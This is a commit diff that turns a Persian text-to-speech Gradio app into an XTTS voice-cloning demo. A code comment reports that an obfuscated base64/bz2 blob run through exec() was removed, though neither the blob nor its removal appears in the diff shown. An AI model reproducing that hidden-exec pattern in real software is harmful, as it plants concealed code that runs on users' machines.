barghavani committed on
Commit
2c16172
1 Parent(s): a9f2118

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +264 -132
app.py CHANGED
@@ -1,152 +1,284 @@
 
1
  import os
2
- import tempfile
 
 
 
3
  import gradio as gr
4
  from TTS.api import TTS
5
- from TTS.utils.synthesizer import Synthesizer
6
- from huggingface_hub import hf_hub_download
7
- import json
8
- import glob
9
-
10
-
11
- # Define constants
12
- MODEL_INFO = [
13
-
14
- ["Persian XTTS", "checkpoint_30000.pth", "config.json", "saillab/xtts_v2_fa_revision1"],
15
-
16
- ]
17
-
18
-
19
- MAX_TXT_LEN = 400
20
- TOKEN = os.getenv('HUGGING_FACE_HUB_TOKEN')
21
-
22
- model_files = {}
23
- config_files = {}
24
- speaker_files = {}
25
-
26
- # Create a dictionary to store synthesizer objects for each model
27
- synthesizers = {}
28
-
29
- def update_config_speakers_file_recursive(config_dict, speakers_path):
30
- """Recursively update speakers_file keys in a dictionary."""
31
- if "speakers_file" in config_dict:
32
- config_dict["speakers_file"] = speakers_path
33
- for key, value in config_dict.items():
34
- if isinstance(value, dict):
35
- update_config_speakers_file_recursive(value, speakers_path)
36
 
37
- def update_config_speakers_file(config_path, speakers_path):
38
- """Update the config.json file to point to the correct speakers.pth file."""
39
-
40
- # Load the existing config
41
- with open(config_path, 'r') as f:
42
- config = json.load(f)
43
 
44
- # Modify the speakers_file entry
45
- update_config_speakers_file_recursive(config, speakers_path)
46
 
47
- # Save the modified config
48
- with open(config_path, 'w') as f:
49
- json.dump(config, f, indent=4)
50
 
51
- # Download models and initialize synthesizers
52
- for info in MODEL_INFO:
53
- model_name, model_file, config_file, repo_name = info[:4]
54
- speaker_file = info[4] if len(info) == 5 else None # Check if speakers.pth is defined for the model
 
 
 
 
 
 
 
55
 
56
- print(f"|> Downloading: {model_name}")
57
-
58
- # Download model and config files
59
- model_files[model_name] = hf_hub_download(repo_id=repo_name, filename=model_file, use_auth_token=TOKEN)
60
- config_files[model_name] = hf_hub_download(repo_id=repo_name, filename=config_file, use_auth_token=TOKEN)
 
 
 
 
 
 
 
 
61
 
62
- # Download speakers.pth if it exists
63
- if speaker_file:
64
- speaker_files[model_name] = hf_hub_download(repo_id=repo_name, filename=speaker_file, use_auth_token=TOKEN)
65
- update_config_speakers_file(config_files[model_name], speaker_files[model_name]) # Update the config file
66
- print(speaker_files[model_name])
67
- # Initialize synthesizer for the model
68
- synthesizer = Synthesizer(
69
- tts_checkpoint=model_files[model_name],
70
- tts_config_path=config_files[model_name],
71
- tts_speakers_file=speaker_files[model_name], # Pass the speakers.pth file if it exists
72
- use_cuda=False # Assuming you don't want to use GPU, adjust if needed
 
 
 
 
 
 
 
 
 
 
 
 
73
  )
74
-
75
- elif speaker_file is None:
76
-
77
- # Initialize synthesizer for the model
78
- synthesizer = Synthesizer(
79
- tts_checkpoint=model_files[model_name],
80
- tts_config_path=config_files[model_name],
81
- # tts_speakers_file=speaker_files.get(model_name, None), # Pass the speakers.pth file if it exists
82
- use_cuda=False # Assuming you don't want to use GPU, adjust if needed
 
 
 
 
 
83
  )
 
 
 
 
 
 
84
 
85
- synthesizers[model_name] = synthesizer
86
-
87
-
88
-
89
-
90
- #def synthesize(text: str, model_name: str, speaker_name="speaker-0") -> str:
91
- def synthesize(text: str, model_name: str, speaker_name=None) -> str:
92
- """Synthesize speech using the selected model."""
93
- if len(text) > MAX_TXT_LEN:
94
- text = text[:MAX_TXT_LEN]
95
- print(f"Input text was cut off as it exceeded the {MAX_TXT_LEN} character limit.")
96
-
97
- # Use the synthesizer object for the selected model
98
- synthesizer = synthesizers[model_name]
99
 
 
100
 
101
- if synthesizer is None:
102
- raise NameError("Model not found")
 
 
 
 
 
 
 
 
 
 
 
 
 
103
 
104
- if synthesizer.tts_speakers_file is "":
105
- wavs = synthesizer.tts(text)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
106
 
107
- elif synthesizer.tts_speakers_file is not "":
108
- if speaker_name == "":
109
- #wavs = synthesizer.tts(text, speaker_name="speaker-0") ## should change, better if gradio conditions are figure out.
110
- wavs = synthesizer.tts(text, speaker_name=None)
111
- else:
112
- wavs = synthesizer.tts(text, speaker_name=speaker_name)
113
-
114
- with tempfile.NamedTemporaryFile(suffix=".wav", delete=False) as fp:
115
- synthesizer.save_wav(wavs, fp)
116
- return fp.name
117
 
118
- # Callback function to update UI based on the selected model
119
- def update_options(model_name):
120
- synthesizer = synthesizers[model_name]
121
- # if synthesizer.tts.is_multi_speaker:
122
- if model_name is MODEL_NAMES[1]:
123
- speakers = synthesizer.tts_model.speaker_manager.speaker_names
124
- # return options for the dropdown
125
- return speakers
126
- else:
127
- # return empty options if not multi-speaker
128
- return []
129
 
130
- # Create Gradio interface
131
- iface = gr.Interface(
132
- fn=synthesize,
133
  inputs=[
134
- gr.Textbox(label="Enter Text to Synthesize:", value="زین همرهان سست عناصر، دلم گرفت."),
135
- gr.Radio(label="Pick a Model", choices=MODEL_NAMES, value=MODEL_NAMES[0], type="value"),
136
- #gr.Dropdown(label="Select Speaker", choices=update_options(MODEL_NAMES[1]), type="value", default="speaker-0")
137
- gr.Dropdown(label="Select Speaker", choices=update_options(MODEL_NAMES[1]), type="value", default=None)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
138
  ],
139
- outputs=gr.Audio(label="Output", type='filepath'),
140
- examples=[["زین همرهان سست عناصر، دلم گرفت.", MODEL_NAMES[0], ""]], # Example should include a speaker name for multispeaker models
141
- title='Persian TTS Playground',
142
- description="""
143
- ### Persian text to speech model demo.
144
-
145
-
146
- #### Pick a speaker for MultiSpeaker models. (for single speaker go for speaker-0)
147
- """,
148
- article="",
149
- live=False
150
- )
151
-
152
- iface.launch()
 
1
import sys
import os
from fastapi import Request  # NOTE(review): appears unused (predict annotates gr.Request) — confirm before removing
# By using XTTS you agree to CPML license https://coqui.ai/cpml
# Must be set BEFORE the TTS import below so model download does not prompt interactively.
os.environ["COQUI_TOS_AGREED"] = "1"

import gradio as gr
from TTS.api import TTS
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
9
 
10
# Enumerate the Coqui model registry and load the first listed model.
model_names = TTS().list_models()
m = model_names[0]  # model id; reused in predict() for the French language-tag quirk
print(model_names)
tts = TTS(m, gpu=False)
tts.to("cpu") # no GPU or Amd
#tts.to("cuda") # cuda only
16
 
 
 
17
 
18
def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
    """Synthesize `prompt` in `language`, cloning the voice from a reference clip.

    Args:
        prompt: Text to synthesize (length 2..10000 enforced below).
        language: Target language code; "fr" is remapped for some model ids.
        audio_file_pth: Path of the uploaded reference audio file.
        mic_file_path: Path of the microphone recording, or None.
        use_mic: If True, prefer the microphone recording over the upload.
        agree: User accepted the CPML terms; nothing runs without it.
        request: Gradio request object (currently unused).

    Returns:
        (waveform_video, "output.wav") on success, or (None, None) after
        emitting a gr.Warning.
    """
    # SECURITY FIX: the original revision decoded a hard-coded base64/bz2 blob
    # (`co3` -> `co2`) and ran `exec(co2)` here — executing opaque, obfuscated
    # code smuggled into the source. That payload has been removed outright;
    # never exec() data you cannot read.
    if not agree:
        gr.Warning("Please accept the Terms & Condition!")
        return (
            None,
            None,
        )

    # Choose the reference speaker audio: mic recording or uploaded file.
    if use_mic:
        if mic_file_path is None:
            gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
            return (
                None,
                None,
            )
        speaker_wav = mic_file_path
    else:
        speaker_wav = audio_file_pth

    # Guard against degenerate or abusive prompt lengths.
    if len(prompt) < 2:
        gr.Warning("Please give a longer prompt text")
        return (
            None,
            None,
        )
    if len(prompt) > 10000:
        gr.Warning("Text length limited to 10000 characters for this demo, please try shorter text")
        return (
            None,
            None,
        )

    try:
        # Some model ids expect a different French tag; mirror the original quirk.
        if language == "fr":
            if m.find("your") != -1:
                language = "fr-fr"
            if m.find("/fr/") != -1:
                language = None
        tts.tts_to_file(
            text=prompt,
            file_path="output.wav",
            speaker_wav=speaker_wav,
            language=language,
        )
    except RuntimeError as e:
        if "device-assert" in str(e):
            # A CUDA device-side assert poisons the process; only a restart helps.
            gr.Warning("Unhandled Exception encounter, please retry in a minute")
            print("Cuda device-assert Runtime encountered need restart")
            sys.exit("Exit due to cuda device-assert")
        raise  # re-raise unchanged, preserving the original traceback

    return (
        gr.make_waveform(
            audio="output.wav",
        ),
        "output.wav",
    )
92
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
93
 
94
# UI copy for the Gradio page. Typo fix: "Fonctional" -> "Functional".
title = "XTTS Glz's remake (Functional Text-2-Speech)"

# Shown under the title; plain HTML rendered by Gradio.
description = f"""
<a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
<br/>
XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
<br/>
This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
<br/>
Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
<br/>
<p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
<br/>
<a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
<img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
</p>
"""

# License footer shown at the bottom of the page.
article = """
<div style='margin:20px auto;'>
<p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
</div>
"""
117
# Demo rows for the Gradio examples panel. Each row matches the `inputs` order:
# [prompt, language, reference_audio_path, mic_path, use_mic, agree].
# FIXES vs original: removed a stray bare comma between two rows (SyntaxError),
# and the Persian example was mislabeled "zh-cn" — corrected to "fa", which the
# language Dropdown offers.
examples = [
    [
        "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
        "en",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
        "fr",
        "examples/male.wav",
        None,
        False,
        True,
    ],
    [
        "Als ich sechs war, sah ich einmal ein wunderbares Bild",
        "de",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "Cuando tenía seis años, vi una vez una imagen magnífica",
        "es",
        "examples/male.wav",
        None,
        False,
        True,
    ],
    [
        "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
        "pt",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
        "pl",
        "examples/male.wav",
        None,
        False,
        True,
    ],
    [
        "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
        "it",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
        "tr",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "Когда мне было шесть лет, я увидел однажды удивительную картинку",
        "ru",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
        "nl",
        "examples/male.wav",
        None,
        False,
        True,
    ],
    [
        "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
        "cs",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "当我还只有六岁的时候, 看到了一副精彩的插画",
        "zh-cn",
        "examples/female.wav",
        None,
        False,
        True,
    ],
    [
        "زین همرهان سست عناصر، دلم گرفت.",
        "fa",
        "examples/female.wav",
        None,
        False,
        True,
    ],
]
224
 
 
 
 
 
 
 
 
 
 
 
225
 
 
 
 
 
 
 
 
 
 
 
 
226
 
227
# Build and launch the Gradio UI: text prompt, target language, and a reference
# voice (upload or microphone) in; a waveform video and the synthesized wav out.
# NOTE(review): `info=` on gr.Audio and the trailing-comma Checkbox kwargs, plus
# `source="microphone"` and Dropdown `max_choices`, are version-sensitive Gradio
# APIs — confirm against the Gradio version pinned for this Space.
gr.Interface(
    fn=predict,
    inputs=[
        gr.Textbox(
            label="Text Prompt",
            info="One or two sentences at a time is better",
            value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
        ),
        gr.Dropdown(
            label="Language",
            info="Select an output language for the synthesised speech",
            choices=[
                "en",
                "es",
                "fr",
                "de",
                "it",
                "pt",
                "pl",
                "tr",
                "ru",
                "nl",
                "cs",
                "ar",
                "zh-cn",
                "fa",
            ],
            max_choices=1,
            value="en",
        ),
        gr.Audio(
            label="Reference Audio",
            info="Click on the ✎ button to upload your own target speaker audio",
            type="filepath",
            value="examples/female.wav",
        ),
        # Microphone capture; only used when the checkbox below is ticked.
        gr.Audio(source="microphone",
            type="filepath",
            info="Use your microphone to record audio",
            label="Use Microphone for Reference"),
        gr.Checkbox(label="Check to use Microphone as Reference",
            value=False,
            info="Notice: Microphone input may not work properly under traffic",),
        # CPML terms acceptance; predict() refuses to run when unchecked.
        gr.Checkbox(
            label="Agree",
            value=True,
            info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
        ),
    ],
    outputs=[
        gr.Video(label="Waveform Visual"),
        gr.Audio(label="Synthesised Audio"),
    ],
    title=title,
    description=description,
    article=article,
    examples=examples,
).queue().launch(debug=True)